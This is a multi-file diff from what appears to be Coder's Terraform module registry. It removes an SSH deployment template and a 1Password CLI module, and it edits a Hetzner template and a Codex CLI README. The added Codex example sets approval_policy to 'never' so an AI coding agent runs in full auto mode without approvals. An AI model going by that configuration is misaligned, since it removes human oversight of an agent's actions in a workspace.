+The Go validation tool (`cmd/readmevalidation/`) checks:
+
+- Repository structure integrity
+- Contributor README files
+- Module and template documentation
+- Frontmatter format compliance
+
+### Versioning
+
+Use semantic versioning for modules:
+
+- **Patch** (1.2.3 → 1.2.4): Bug fixes
+- **Minor** (1.2.3 → 1.3.0): New features, adding inputs
+- **Major** (1.2.3 → 2.0.0): Breaking changes
+
+## Dependencies & Tools
+
+### Required Tools
+
+- **Terraform** - Module development and testing
+- **Docker** - Container-based testing
+- **Bun** - JavaScript runtime for formatting/scripts
+- **Go 1.23+** - Validation tooling
+
+### Development Dependencies
+
+- Prettier with Terraform and shell plugins
+- TypeScript for test utilities
+- Various npm packages for documentation processing
+
+## Workflow Notes
+
+### Contributing Process
+
+1. Create namespace (first-time contributors)
+2. Generate module/template files using scripts
+3. Implement functionality and tests
+4. Run formatting and validation
+5. Submit PR with appropriate template
+
+### Testing Workflow
+
+- All modules must pass `terraform test`
+- Use `bun run test` for comprehensive testing
+- Format code with `bun run fmt` before submission
+- Manual testing recommended for templates
+
+### Namespace Management
+
+- Each contributor gets unique namespace
+- Namespace avatar required (avatar.png/svg in .images/)
+- Namespace README with contributor info and frontmatter
@@ -137,12 +137,11 @@ locals {
  hcloud_server_types = {
    for st in jsondecode(data.http.hcloud_server_types.response_body).server_types :
    st.name => {
-      cores        = st.cores
-      memory_gb    = st.memory
-      disk_gb      = st.disk
-      architecture = st.architecture
-      locations    = [for l in st.locations : l.name]
-      deprecated   = st.deprecated
+      cores      = st.cores
+      memory_gb  = st.memory
+      disk_gb    = st.disk
+      locations  = [for l in st.locations : l.name]
+      deprecated = st.deprecated
    }
    if st.deprecated == false
  }
@@ -163,19 +162,6 @@ locals {
      data.coder_parameter.hcloud_location.value
    )
  ]
-
-  # Map Hetzner architecture (x86 or arm) to Coder agent architecture (amd64 or arm64)
-  agent_arch = try(
-    lookup(
-      {
-        "x86" = "amd64"
-        "arm" = "arm64"
-      },
-      local.hcloud_server_types[data.coder_parameter.hcloud_server_type.value].architecture,
-      "amd64" # Fallback if not returned
-    ),
-    "amd64" # Fallback for template setup
-  )
 }

 data "coder_provisioner" "me" {}
@@ -201,7 +187,7 @@ data "coder_parameter" "home_volume_size" {

 resource "coder_agent" "main" {
  os   = "linux"
-  arch = local.agent_arch
+  arch = "amd64"

  metadata {
    key          = "cpu"
@@ -1,16 +0,0 @@
---
-display_name: "Tao Chen"
-bio: "I believe in the power of technology to simplify life. Currently a freelancer, working on ideas that matter."
-github: "IamTaoChen"
-avatar: "./.images/avatar.png"
-support_email: "IamTaoChen@gmail.com"
-status: "community"
---
-
-# Tao Chen
-
-## Template
-
-### ssh-linux
-
-Provision an existing Linux system as a workspace by deploying the Coder agent via SSH with this example template.
@@ -1,58 +0,0 @@
---
-display_name: Deploy Coder on existing Linux System
-description: Provision an existing Linux system as a workspace by deploying the Coder agent via SSH with this example template.
-icon: "../../../../.icons/linux.svg"
-verified: false
-tags: ["linux"]
---
-
-# Deploy Coder on existing Linux system
-
-Provision an existing Linux system as a [Coder workspace](https://coder.com/docs/workspaces) by deploying the Coder agent via SSH with this example template.
-
-## Prerequisites
-
-### Authentication
-
-This template assumes you have SSH access to the target Linux system. You can use either password-based authentication or an SSH private key. Ensure the target system allows SSH connections and has basic utilities like `bash` installed. The user account specified must have sufficient permissions to execute scripts and manage processes in their home directory.
-
-For more details on SSH setup, consult your Linux distribution's documentation or standard SSH guides.
-
-## Architecture
-
-This template deploys the following:
-
- A Coder agent configured for Linux (amd64 architecture).
- Conditional parameters for SSH authentication (password or key).
- A selection of applications (e.g., VS Code Desktop, VS Code Web, Cursor) that can be enabled via multi-select.
- `null_resource` blocks to handle workspace start/stop:
-  - On start: Connects via SSH, creates a cache directory, writes and executes the agent's init script in the background, and logs the process ID.
-  - On stop: Connects via SSH, kills the agent process if running, and removes the cache directory.
- Optional modules for additional apps like `coder-login`, `cursor`, and `vscode-web`, which are provisioned only if selected and when the workspace starts.
-
-This setup does not provision new infrastructure; it remotely deploys and manages the Coder agent on your existing Linux host. Files and configurations in the user's home directory persist across restarts, but the agent is stopped and cleaned up on workspace stop.
-
-### Persistent Agent
-
-The agent is ephemeral by design (started on workspace start, stopped on stop). If you need a persistently running agent, modify the template to remove the stop logic or run the agent manually on the host.
-
-## Security Considerations
-
-Warning: This template stores SSH credentials (password or private key) in the Terraform state file and passes them as environment variables during deployment. In production environments, this can introduce security risks, as the state file contains sensitive information in plain text and may be accessible if not properly secured.
-
-## Usage
-
-1. Create a new workspace in Coder using this template.
-2. Fill in the parameters with your Linux system's details.
-3. Start the workspace—Coder will connect via SSH and deploy the agent.
-4. Access the workspace through the Coder dashboard. Selected apps (e.g., VS Code) will be available.
-5. On stop, the agent process is terminated and cleaned up.
-
-## Troubleshooting
-
- **SSH Connection Issues**: Verify the host, port, username, and credentials. Check firewall rules and SSH server status on the target system. Review the debug log at `~/.coder/<workspace_id>/debug.log` on the remote host.
- **Agent Not Starting**: Inspect the log file at `~/.coder/<workspace_id>/coder.log` on the remote host for errors.
- **App Not Appearing**: Ensure the app is selected in parameters and the workspace is restarted if changes are made.
- **Validation Errors**: Parameters like host and port have built-in validations—ensure inputs match the requirements.
-
-For more advanced customization, refer to the [Coder Terraform provider documentation](https://registry.terraform.io/providers/coder/coder/latest/docs).
@@ -1,319 +0,0 @@
-terraform {
-  required_providers {
-    coder = {
-      source  = "coder/coder"
-      version = ">= 2.4.0"
-    }
-    random = {
-      source  = "hashicorp/random"
-      version = ">= 3.6"
-    }
-  }
-}
-
-provider "coder" {}
-data "coder_workspace" "me" {}
-data "coder_workspace_owner" "me" {}
-
-
-data "coder_parameter" "host" {
-  description  = "Remote Host or IP"
-  display_name = "Host"
-  name         = "host"
-  type         = "string"
-  default      = "192.168.1.1"
-  mutable      = false
-  order        = 1
-  validation {
-    regex = "^[a-zA-Z0-9:.%\\-]+$"
-    error = "Please enter a valid hostname, IPv4, or IPv6 address. Examples: example.com, 192.168.1.1, or fe80::1"
-  }
-}
-
-data "coder_parameter" "username" {
-  default      = data.coder_workspace_owner.me.name
-  description  = "SSH Username"
-  display_name = "Username"
-  name         = "username"
-  mutable      = false
-  order        = 2
-}
-
-data "coder_parameter" "auth_type" {
-  name         = "auth_type"
-  display_name = "SSH Auth Type"
-  description  = "Authentication method for SSH"
-  type         = "string"
-
-  form_type = "dropdown"
-  default   = "password"
-  mutable   = true
-  order     = 3
-  option {
-    name  = "password"
-    value = "password"
-  }
-
-  option {
-    name  = "SSH Key Manual"
-    value = "ssh_key"
-  }
-
-  option {
-    name  = "SSH Key from Coder"
-    value = "ssh_key_coder"
-  }
-
-}
-
-data "coder_parameter" "ssh_password" {
-  count        = data.coder_parameter.auth_type.value == "password" ? 1 : 0
-  name         = "ssh_password"
-  display_name = "SSH Password"
-  description  = "Password for SSH login"
-  type         = "string"
-  mutable      = true
-  styling = jsonencode({
-    mask_input = true
-  })
-  order = 4
-}
-
-data "coder_parameter" "ssh_key" {
-  count        = data.coder_parameter.auth_type.value == "ssh_key" ? 1 : 0
-  name         = "ssh_key"
-  display_name = "SSH Private Key"
-  description  = "Paste SSH private key"
-  type         = "string"
-  mutable      = true
-  form_type    = "textarea"
-  styling = jsonencode({
-    mask_input = true
-  })
-  order = 4
-}
-
-data "coder_parameter" "ssh_key_coder" {
-  count        = data.coder_parameter.auth_type.value == "ssh_key_coder" ? 1 : 0
-  name         = "ssh_key_coder"
-  display_name = "Public Key From Coder"
-  description  = "Add this public key to your remote server's authorized_keys: \n\n${data.coder_workspace_owner.me.ssh_public_key}"
-  default      = "********************"
-  styling = jsonencode({
-    disabled   = true
-    mask_input = true
-  })
-  order = 4
-}
-
-
-data "coder_parameter" "port" {
-  default      = 22
-  description  = "SSH Port"
-  display_name = "Port"
-  name         = "port"
-  type         = "number"
-  mutable      = true
-  order        = 5
-  validation {
-    min   = 1
-    max   = 65535
-    error = "Port must be between 1 and 65535"
-  }
-}
-
-data "coder_parameter" "apps" {
-  name         = "apps"
-  display_name = "Choose any APPs for your workspace."
-  type         = "list(string)"
-  form_type    = "multi-select"
-  mutable      = true
-  default      = jsonencode(["VS Code Desktop"])
-  dynamic "option" {
-    for_each = local.apps_candidate
-    content {
-      name  = option.value
-      value = option.value
-    }
-  }
-}
-
-locals {
-  username        = data.coder_parameter.username.value
-  home_dir        = "/home/${lower(local.username)}"
-  coder_cache_dir = "${local.home_dir}/.coder/${data.coder_workspace.me.id}"
-  agent_id_file   = "${local.coder_cache_dir}/agent.id"
-  use_password    = data.coder_parameter.auth_type.value == "password"
-  use_key         = contains(["ssh_key", "ssh_key_coder"], data.coder_parameter.auth_type.value)
-  ssh_password    = local.use_password ? data.coder_parameter.ssh_password[0].value : null
-  ssh_private_key = data.coder_parameter.auth_type.value == "ssh_key_coder" ? data.coder_workspace_owner.me.ssh_private_key : (length(data.coder_parameter.ssh_key) > 0 ? data.coder_parameter.ssh_key[0].value : null)
-  apps_candidate  = ["VS Code Desktop", "VS Code Web", "Cursor"]
-  apps_selected   = (can(data.coder_parameter.apps.value) && data.coder_parameter.apps.value != "") ? jsondecode(data.coder_parameter.apps.value) : []
-}
-
-resource "random_integer" "vs_code_port" {
-  min = 54000
-  max = 55999
-}
-
-resource "coder_agent" "main" {
-  os   = "linux"
-  arch = "amd64"
-
-  startup_script = <<-EOT
-    #!/bin/bash
-    set -euo pipefail
-  EOT
-
-  env = {
-    GIT_AUTHOR_NAME     = coalesce(data.coder_workspace_owner.me.full_name, data.coder_workspace_owner.me.name)
-    GIT_AUTHOR_EMAIL    = "${data.coder_workspace_owner.me.email}"
-    GIT_COMMITTER_NAME  = coalesce(data.coder_workspace_owner.me.full_name, data.coder_workspace_owner.me.name)
-    GIT_COMMITTER_EMAIL = "${data.coder_workspace_owner.me.email}"
-  }
-
-  display_apps {
-    port_forwarding_helper = true
-    vscode                 = contains(local.apps_selected, "VS Code Desktop")
-    vscode_insiders        = false
-    web_terminal           = true
-    ssh_helper             = true
-  }
-
-  metadata {
-    key          = "cpu"
-    display_name = "CPU Usage"
-    interval     = 5
-    timeout      = 5
-    script       = "coder stat cpu"
-  }
-  metadata {
-    key          = "memory"
-    display_name = "Memory Usage"
-    interval     = 5
-    timeout      = 5
-    script       = "coder stat mem"
-  }
-  metadata {
-    key          = "disk"
-    display_name = "Home Disk Usage"
-    interval     = 600
-    timeout      = 30
-    script       = "coder stat disk --path ${lower(local.home_dir)}"
-  }
-}
-
-resource "null_resource" "deploy_coder_agent" {
-  count = data.coder_workspace.me.start_count
-
-  triggers = {
-    init_script = sha256(coder_agent.main.init_script)
-    token       = coder_agent.main.token
-  }
-
-  connection {
-    type        = "ssh"
-    host        = data.coder_parameter.host.value
-    user        = data.coder_parameter.username.value
-    port        = data.coder_parameter.port.value
-    password    = local.ssh_password
-    private_key = local.ssh_private_key
-    timeout     = "5m"
-  }
-
-  provisioner "remote-exec" {
-    inline = [
-      "mkdir -p ${local.coder_cache_dir}",
-      "coder_sh=${local.coder_cache_dir}/coder.sh",
-      "log_file=${local.coder_cache_dir}/coder.log",
-      "cat > $coder_sh << 'EOF'",
-      "${coder_agent.main.init_script}",
-      "EOF",
-      "chmod +x $coder_sh",
-      "echo \"$(date) : create $coder_sh\" >> ${local.coder_cache_dir}/debug.log",
-      "nohup env CODER_AGENT_TOKEN='${coder_agent.main.token}' $coder_sh > $log_file 2>&1 &",
-      "echo $! > ${local.agent_id_file}",
-      "echo \"$(date) : run $coder_sh and log at $log_file\" >> ${local.coder_cache_dir}/debug.log",
-    ]
-  }
-}
-
-resource "null_resource" "coder_stop" {
-  count = (try(data.coder_workspace.me.start_count, 1) > 0 ? 0 : 1)
-
-  connection {
-    type        = "ssh"
-    host        = data.coder_parameter.host.value
-    user        = data.coder_parameter.username.value
-    port        = data.coder_parameter.port.value
-    password    = local.ssh_password
-    private_key = local.ssh_private_key
-    timeout     = "5m"
-  }
-
-  provisioner "remote-exec" {
-    inline = [
-      "set -u",
-      "PID_FILE=${local.agent_id_file}",
-      # Only proceed if PID file exists
-      "if [ -f \"$PID_FILE\" ]; then",
-      "  PID=$(cat \"$PID_FILE\")",
-      #   Check if it's actually a number and process exists
-      "  if [ -n \"$PID\" ] && echo \"$PID\" | grep -q '^[0-9][0-9]*$' && kill -0 \"$PID\" 2>/dev/null; then",
-      "    echo \"Gracefully stopping process $PID...\"",
-      #    First try graceful termination
-      "    kill -TERM \"$PID\" 2>/dev/null || true",
-      #     Wait and check repeatedly (up to ~15 seconds total)
-      "    for i in $(seq 1 15); do",
-      "      sleep 1",
-      "      if ! kill -0 \"$PID\" 2>/dev/null; then",
-      "        echo \"Process $PID terminated gracefully\"",
-      "        break",
-      "      fi",
-      #      Show we're still waiting (every 5 seconds)
-      "      expr $i % 5 = 0 >/dev/null && echo \"Still waiting... ($i/15 seconds)\"",
-      "    done",
-      #     Final check - only kill -9 if still alive"
-      "    if kill -0 \"$PID\" 2>/dev/null; then",
-      "      echo \"Process $PID did not terminate in time - sending SIGKILL\"",
-      "      kill -KILL \"$PID\" 2>/dev/null || true",
-      "    fi",
-      "  else",
-      "    echo \"No running process found for PID $PID (or invalid PID)\"",
-      "  fi",
-      "  ",
-      #  Clean lean up regardless of whether kill succeeded
-      "  rm -f \"$PID_FILE\"",
-      "  rm -rf ${local.coder_cache_dir} 2>/dev/null || true",
-      "else",
-      "  echo \"PID file not found: $PID_FILE - nothing to clean up\"",
-      "fi",
-      "sync 2>/dev/null || true",
-    ]
-  }
-}
-
-
-module "coder-login" {
-  count    = data.coder_workspace.me.start_count
-  source   = "registry.coder.com/coder/coder-login/coder"
-  version  = "1.1.1"
-  agent_id = coder_agent.main.id
-}
-
-module "cursor" {
-  count    = contains(local.apps_selected, "Cursor") ? data.coder_workspace.me.start_count : 0
-  source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.0"
-  agent_id = coder_agent.main.id
-}
-
-module "vscode-web" {
-  count          = contains(local.apps_selected, "VS Code Web") ? data.coder_workspace.me.start_count : 0
-  source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "1.4.3"
-  agent_id       = coder_agent.main.id
-  folder         = local.home_dir
-  port           = random_integer.vs_code_port.result
-  accept_license = true
-}
@@ -1,11 +0,0 @@
---
-display_name: Ben Potter
-bio: Tinkerer and Product Manager at Coder
-github: bpmct
-avatar: ./.images/avatar.png
-status: community
---
-
-# Ben Potter
-
-Tinkerer and Product Manager at Coder. Building modules to make dev environments better.
@@ -1,97 +0,0 @@
---
-display_name: "1Password"
-description: "Install the 1Password CLI and VS Code extension in your Coder workspace"
-icon: ../../../../.icons/1password.svg
-verified: false
-tags: [integration, 1password, secrets]
---
-
-# 1Password
-
-Install the [1Password CLI](https://developer.1password.com/docs/cli/)
-(`op`) in your Coder workspace and optionally authenticate with a service
-account token. Can also install the
-[1Password VS Code extension](https://marketplace.visualstudio.com/items?itemName=1Password.op-vscode)
-for code-server and VS Code.
-
-![1Password module in Coder](../../.images/onepassword-demo.png)
-
-```tf
-module "onepassword" {
-  source                = "registry.coder.com/bpmct/onepassword/coder"
-  version               = "1.0.2"
-  agent_id              = coder_agent.main.id
-  service_account_token = var.op_service_account_token
-}
-```
-
-## Authentication
-
-### Service Account (recommended)
-
-Create a [1Password service account](https://developer.1password.com/docs/service-accounts/get-started/)
-and pass the token as a Terraform variable. The module sets
-`OP_SERVICE_ACCOUNT_TOKEN` in the workspace so `op` commands work
-immediately.
-
-```tf
-variable "op_service_account_token" {
-  type      = string
-  sensitive = true
-}
-
-module "onepassword" {
-  source                = "registry.coder.com/bpmct/onepassword/coder"
-  version               = "1.0.2"
-  agent_id              = coder_agent.main.id
-  service_account_token = var.op_service_account_token
-}
-```
-
-### Personal Account
-
-Pass your account details and the module will pre-register the account.
-You'll be prompted for your password when you run `op signin` in the
-terminal.
-
-```tf
-module "onepassword" {
-  source             = "registry.coder.com/bpmct/onepassword/coder"
-  version            = "1.0.2"
-  agent_id           = coder_agent.main.id
-  account_address    = "myteam.1password.com"
-  account_email      = "you@example.com"
-  account_secret_key = var.op_secret_key
-}
-```
-
-## VS Code Extension
-
-Set `install_vscode_extension = true` to install the 1Password extension
-for code-server and VS Code.
-
-```tf
-module "onepassword" {
-  source                   = "registry.coder.com/bpmct/onepassword/coder"
-  version                  = "1.0.2"
-  agent_id                 = coder_agent.main.id
-  service_account_token    = var.op_service_account_token
-  install_vscode_extension = true
-}
-```
-
-## Custom Scripts
-
-Run custom logic before or after the CLI is installed.
-
-```tf
-module "onepassword" {
-  source                = "registry.coder.com/bpmct/onepassword/coder"
-  version               = "1.0.2"
-  agent_id              = coder_agent.main.id
-  service_account_token = var.op_service_account_token
-  post_install_script   = <<-EOT
-    op read "op://Vault/item/field" > ~/.secret
-  EOT
-}
-```
@@ -1,112 +0,0 @@
-terraform {
-  required_version = ">= 1.0"
-
-  required_providers {
-    coder = {
-      source  = "coder/coder"
-      version = ">= 0.17"
-    }
-  }
-}
-
-variable "agent_id" {
-  type        = string
-  description = "The ID of a Coder agent."
-}
-
-variable "service_account_token" {
-  type        = string
-  description = "A 1Password service account token. If set, account-based sign-in is skipped."
-  default     = ""
-  sensitive   = true
-}
-
-variable "account_address" {
-  type        = string
-  description = "The 1Password account sign-in address (e.g. myteam.1password.com)."
-  default     = ""
-}
-
-variable "account_email" {
-  type        = string
-  description = "The email address for the 1Password account."
-  default     = ""
-}
-
-variable "account_secret_key" {
-  type        = string
-  description = "The Secret Key for the 1Password account."
-  default     = ""
-  sensitive   = true
-}
-
-variable "install_dir" {
-  type        = string
-  description = "The directory to install the 1Password CLI to."
-  default     = "/usr/local/bin"
-}
-
-variable "op_cli_version" {
-  type        = string
-  description = "The version of the 1Password CLI to install."
-  default     = "latest"
-  validation {
-    condition     = var.op_cli_version == "latest" || can(regex("^[0-9]+\\.[0-9]+\\.[0-9]+$", var.op_cli_version))
-    error_message = "op_cli_version must be either 'latest' or a semantic version (e.g., '2.30.0')."
-  }
-}
-
-variable "install_vscode_extension" {
-  type        = bool
-  description = "Install the 1Password VS Code extension for both VS Code and code-server."
-  default     = false
-}
-
-variable "pre_install_script" {
-  type        = string
-  description = "Custom script to run before installing the 1Password CLI."
-  default     = null
-}
-
-variable "post_install_script" {
-  type        = string
-  description = "Custom script to run after installing the 1Password CLI."
-  default     = null
-}
-
-data "coder_parameter" "account_password" {
-  count        = var.account_address != "" && var.service_account_token == "" ? 1 : 0
-  type         = "string"
-  name         = "op_account_password"
-  display_name = "1Password Account Password"
-  description  = "Your 1Password account password. Used to sign in to the CLI."
-  mutable      = true
-  default      = ""
-}
-
-resource "coder_script" "onepassword" {
-  agent_id     = var.agent_id
-  display_name = "1Password CLI"
-  icon         = "/icon/1password.svg"
-  script = templatefile("${path.module}/run.sh", {
-    SERVICE_ACCOUNT_TOKEN    = var.service_account_token
-    ACCOUNT_ADDRESS          = var.account_address
-    ACCOUNT_EMAIL            = var.account_email
-    ACCOUNT_SECRET_KEY       = var.account_secret_key
-    ACCOUNT_PASSWORD         = var.account_address != "" && var.service_account_token == "" ? data.coder_parameter.account_password[0].value : ""
-    INSTALL_DIR              = var.install_dir
-    OP_CLI_VERSION           = var.op_cli_version
-    INSTALL_VSCODE_EXTENSION = var.install_vscode_extension
-    PRE_INSTALL_SCRIPT       = var.pre_install_script != null ? base64encode(var.pre_install_script) : ""
-    POST_INSTALL_SCRIPT      = var.post_install_script != null ? base64encode(var.post_install_script) : ""
-  })
-  run_on_start       = true
-  start_blocks_login = true
-}
-
-resource "coder_env" "op_service_account_token" {
-  count    = var.service_account_token != "" ? 1 : 0
-  agent_id = var.agent_id
-  name     = "OP_SERVICE_ACCOUNT_TOKEN"
-  value    = var.service_account_token
-}
@@ -1,176 +0,0 @@
-#!/usr/bin/env bash
-
-SERVICE_ACCOUNT_TOKEN="${SERVICE_ACCOUNT_TOKEN}"
-ACCOUNT_ADDRESS="${ACCOUNT_ADDRESS}"
-ACCOUNT_EMAIL="${ACCOUNT_EMAIL}"
-ACCOUNT_SECRET_KEY="${ACCOUNT_SECRET_KEY}"
-ACCOUNT_PASSWORD="${ACCOUNT_PASSWORD}"
-INSTALL_DIR="${INSTALL_DIR}"
-OP_CLI_VERSION="${OP_CLI_VERSION}"
-INSTALL_VSCODE_EXTENSION="${INSTALL_VSCODE_EXTENSION}"
-PRE_INSTALL_SCRIPT="${PRE_INSTALL_SCRIPT}"
-POST_INSTALL_SCRIPT="${POST_INSTALL_SCRIPT}"
-
-fetch() {
-  if command -v curl > /dev/null 2>&1; then
-    curl -sSL --fail "$1"
-  elif command -v wget > /dev/null 2>&1; then
-    wget -qO- "$1"
-  else
-    printf "curl or wget is not installed.\n" && return 1
-  fi
-}
-
-fetch_to_file() {
-  if command -v curl > /dev/null 2>&1; then
-    curl -sSL --fail "$2" -o "$1"
-  elif command -v wget > /dev/null 2>&1; then
-    wget -O "$1" "$2"
-  else
-    printf "curl or wget is not installed.\n" && return 1
-  fi
-}
-
-run_script() {
-  local ENCODED="$1" LABEL="$2"
-  if [ -n "$${ENCODED}" ]; then
-    printf "Running %s script...\n" "$${LABEL}"
-    SCRIPT_PATH=$(mktemp /tmp/op-"$${LABEL}"-XXXXXX.sh)
-    printf '%s' "$${ENCODED}" | base64 -d > "$${SCRIPT_PATH}"
-    chmod +x "$${SCRIPT_PATH}"
-    # shellcheck disable=SC2288
-    "$${SCRIPT_PATH}" || printf "WARNING: %s script failed.\n" "$${LABEL}"
-    rm -f "$${SCRIPT_PATH}"
-  fi
-}
-
-install() {
-  ARCH=$(uname -m)
-  if [ "$${ARCH}" = "x86_64" ]; then
-    ARCH="amd64"
-  elif [ "$${ARCH}" = "aarch64" ]; then
-    ARCH="arm64"
-  else
-    printf "Unsupported architecture: %s\n" "$${ARCH}" && return 1
-  fi
-
-  OS=$(uname -s | tr '[:upper:]' '[:lower:]')
-  if [ "$${OS}" != "linux" ] && [ "$${OS}" != "darwin" ]; then
-    printf "Unsupported OS: %s\n" "$${OS}" && return 1
-  fi
-
-  if [ "$${OP_CLI_VERSION}" = "latest" ]; then
-    OP_CLI_VERSION=$(fetch "https://app-updates.agilebits.com/check/1/0/CLI2/en/2.0.0/N" \
-      | grep -oE '"version":"[^"]+"' | head -1 | cut -d'"' -f4) || true
-    if [ -z "$${OP_CLI_VERSION}" ]; then
-      printf "Failed to resolve latest version, falling back to 2.30.3.\n"
-      OP_CLI_VERSION="2.30.3"
-    fi
-  fi
-
-  printf "1Password CLI version: %s\n" "$${OP_CLI_VERSION}"
-
-  if command -v op > /dev/null 2>&1; then
-    CURRENT_VERSION=$(op --version 2> /dev/null || true)
-    if [ "$${CURRENT_VERSION}" = "$${OP_CLI_VERSION}" ]; then
-      printf "Already installed.\n"
-      return 0
-    fi
-  fi
-
-  DOWNLOAD_URL="https://cache.agilebits.com/dist/1P/op2/pkg/v$${OP_CLI_VERSION}/op_$${OS}_$${ARCH}_v$${OP_CLI_VERSION}.zip"
-
-  TEMP_DIR=$(mktemp -d)
-  cd "$${TEMP_DIR}" || return 1
-
-  if ! fetch_to_file op.zip "$${DOWNLOAD_URL}"; then
-    rm -rf "$${TEMP_DIR}" && return 1
-  fi
-
-  if command -v unzip > /dev/null 2>&1; then
-    unzip -o op.zip -d . > /dev/null
-  elif command -v busybox > /dev/null 2>&1; then
-    busybox unzip op.zip -d .
-  else
-    printf "unzip is not installed.\n"
-    rm -rf "$${TEMP_DIR}" && return 1
-  fi
-
-  chmod +x op
-
-  if [ -n "$${INSTALL_DIR}" ] && [ -w "$${INSTALL_DIR}" ]; then
-    mv op "$${INSTALL_DIR}/op"
-  elif [ -n "$${INSTALL_DIR}" ] && sudo mv op "$${INSTALL_DIR}/op" 2> /dev/null; then
-    true
-  else
-    mkdir -p ~/.local/bin && mv op ~/.local/bin/op
-    INSTALL_DIR=~/.local/bin
-  fi
-  printf "Installed to %s.\n" "$${INSTALL_DIR}"
-
-  rm -rf "$${TEMP_DIR}"
-}
-
-run_script "$${PRE_INSTALL_SCRIPT}" "pre-install"
-
-if ! install; then
-  printf "Failed to install 1Password CLI.\n"
-  exit 1
-fi
-
-if [ -n "$${SERVICE_ACCOUNT_TOKEN}" ]; then
-  printf "Service account token configured.\n"
-elif [ -n "$${ACCOUNT_ADDRESS}" ] && [ -n "$${ACCOUNT_EMAIL}" ]; then
-  ADD_ARGS="--address $${ACCOUNT_ADDRESS} --email $${ACCOUNT_EMAIL}"
-  if [ -n "$${ACCOUNT_SECRET_KEY}" ]; then
-    ADD_ARGS="$${ADD_ARGS} --secret-key $${ACCOUNT_SECRET_KEY}"
-  fi
-
-  if [ -n "$${ACCOUNT_PASSWORD}" ] && command -v expect > /dev/null 2>&1; then
-    OP_SESSION=$(expect -c "
-      log_user 0
-      spawn op account add $${ADD_ARGS} --raw
-      expect \"Enter the password*\"
-      send \"$${ACCOUNT_PASSWORD}\r\"
-      expect eof
-      catch wait result
-      set output \$expect_out(buffer)
-      puts -nonewline \$output
-    " 2>&1)
-    if op account list 2> /dev/null | grep -q "$${ACCOUNT_ADDRESS}"; then
-      printf "Signed in to %s.\n" "$${ACCOUNT_ADDRESS}"
-      if [ -n "$${OP_SESSION}" ]; then
-        mkdir -p "$${HOME}/.op"
-        SESSION_VAR="OP_SESSION_$(printf '%s' "$${ACCOUNT_ADDRESS}" | tr '.' '_' | tr '-' '_')"
-        printf 'export %s="%s"\n' "$${SESSION_VAR}" "$${OP_SESSION}" > "$${HOME}/.op/session"
-        chmod 600 "$${HOME}/.op/session"
-        for rc in "$${HOME}/.bashrc" "$${HOME}/.zshrc"; do
-          if [ -f "$${rc}" ] && ! grep -q ".op/session" "$${rc}" 2> /dev/null; then
-            printf '\n[ -f ~/.op/session ] && . ~/.op/session\n' >> "$${rc}"
-          fi
-        done
-      fi
-    else
-      printf "Sign-in failed. Run manually: op signin --account %s\n" "$${ACCOUNT_ADDRESS}"
-    fi
-  else
-    printf "To sign in, run in your terminal:\n"
-    printf "  op account add %s\n" "$${ADD_ARGS}"
-  fi
-fi
-
-if [ "$${INSTALL_VSCODE_EXTENSION}" = "true" ]; then
-  EXTENSION_ID="1Password.op-vscode"
-  for _ in 1 2 3 4 5 6; do
-    command -v code-server > /dev/null 2>&1 || command -v code > /dev/null 2>&1 && break
-    sleep 5
-  done
-  if command -v code-server > /dev/null 2>&1; then
-    cd /tmp && code-server --install-extension "$${EXTENSION_ID}" --force 2>&1 || true
-  fi
-  if command -v code > /dev/null 2>&1; then
-    cd /tmp && code --install-extension "$${EXTENSION_ID}" --force 2>&1 || true
-  fi
-fi
-
-run_script "$${POST_INSTALL_SCRIPT}" "post-install"
@@ -3,7 +3,7 @@ display_name: Codex CLI
 icon: ../../../../.icons/openai.svg
 description: Run Codex CLI in your workspace with AgentAPI integration
 verified: true
-tags: [agent, codex, ai, openai, tasks, aibridge]
+tags: [agent, codex, ai, openai, tasks]
 ---

 # Codex CLI
@@ -13,7 +13,7 @@ Run Codex CLI in your workspace to access OpenAI's models through the Codex inte
 ```tf
 module "codex" {
  source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.3.1"
+  version        = "4.0.0"
  agent_id       = coder_agent.example.id
  openai_api_key = var.openai_api_key
  workdir        = "/home/coder/project"
@@ -32,7 +32,7 @@ module "codex" {
 module "codex" {
  count          = data.coder_workspace.me.start_count
  source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.3.1"
+  version        = "4.0.0"
  agent_id       = coder_agent.example.id
  openai_api_key = "..."
  workdir        = "/home/coder/project"
@@ -40,44 +40,7 @@ module "codex" {
 }
 ```

-### Usage with AI Bridge
-
-[AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) is a Premium Coder feature that provides centralized LLM proxy management. To use AI Bridge, set `enable_aibridge = true`. Requires Coder version 2.30+
-
-For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage with Tasks](#usage-with-tasks) example below.
-
-#### Standalone usage with AI Bridge
-
-```tf
-module "codex" {
-  source          = "registry.coder.com/coder-labs/codex/coder"
-  version         = "4.3.1"
-  agent_id        = coder_agent.example.id
-  workdir         = "/home/coder/project"
-  enable_aibridge = true
-}
-```
-
-When `enable_aibridge = true`, the module:
-
- Configures Codex to use the aibridge model_provider with `base_url` pointing to `${data.coder_workspace.me.access_url}/api/v2/aibridge/openai/v1` and `env_key` pointing to the workspace owner's session token
-
-```toml
-model_provider = "aibridge"
-
-[model_providers.aibridge]
-name = "AI Bridge"
-base_url = "https://example.coder.com/api/v2/aibridge/openai/v1"
-env_key = "CODER_AIBRIDGE_SESSION_TOKEN"
-wire_api = "responses"
-```
-
-This allows Codex to route API requests through Coder's AI Bridge instead of directly to OpenAI's API.
-Template build will fail if `openai_api_key` is provided alongside `enable_aibridge = true`.
-
-### Usage with Tasks
-
-This example shows how to configure Codex with Coder tasks.
+### Tasks integration

 ```tf
 resource "coder_ai_task" "task" {
@@ -89,51 +52,55 @@ data "coder_task" "me" {}

 module "codex" {
  source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.3.1"
+  version        = "4.0.0"
  agent_id       = coder_agent.example.id
  openai_api_key = "..."
  ai_prompt      = data.coder_task.me.prompt
  workdir        = "/home/coder/project"

-  # Optional: route through AI Bridge (Premium feature)
-  # enable_aibridge = true
+  # Custom configuration for full auto mode
+  base_config_toml = <<-EOT
+    approval_policy = "never"
+    preferred_auth_method = "apikey"
+  EOT
 }
 ```

-### Usage with Agent Boundaries
+> [!WARNING]
+> This module configures Codex with a `workspace-write` sandbox that allows AI tasks to read/write files in the specified workdir. While the sandbox provides security boundaries, Codex can still modify files within the workspace. Use this module _only_ in trusted environments and be aware of the security implications.

-This example shows how to configure the Codex module to run the agent behind a process-level boundary that restricts its network access.
+## How it Works

